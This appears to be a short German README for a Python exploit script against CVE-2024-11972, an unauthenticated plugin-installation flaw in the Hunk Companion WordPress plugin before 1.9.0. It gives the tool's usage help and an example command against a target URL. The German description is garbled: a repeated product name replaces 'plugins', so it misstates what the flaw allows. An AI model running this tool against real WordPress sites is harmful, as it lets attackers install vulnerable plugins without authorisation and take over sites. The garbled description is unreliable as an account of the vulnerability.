
Hunk Companion < 1.9.0 - Nicht authentifizierte Plugin-Installation
Hunk Companion < 1.9.0 - Unauthentifizierte Plugin-Installation
Das Hunk Companion WordPress-Plugin vor 1.9.0 autorisiert einige REST-API-Endpunkte nicht korrekt, sodass unauthentifizierte Anfragen beliebige Hunk Companion WordPress-Plugins vor 1.9.0 aus dem WordPress.org-Repo installieren und aktivieren können, einschließlich anfälliger Hunk Companion WordPress-Plugins vor 1.9.0, die geschlossen wurden.
usage: CVE-2024-11972.py [-h] -u URL [-p PLUGIN]
Hunk Companion < 1.9.0 - Unauthenticated Plugin Installation
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
-p PLUGIN, --plugin PLUGIN
Plugin slug (default: Yoast SEO)
python CVE-2024-11972.py -u "http://example.com" -p "plugin-slug"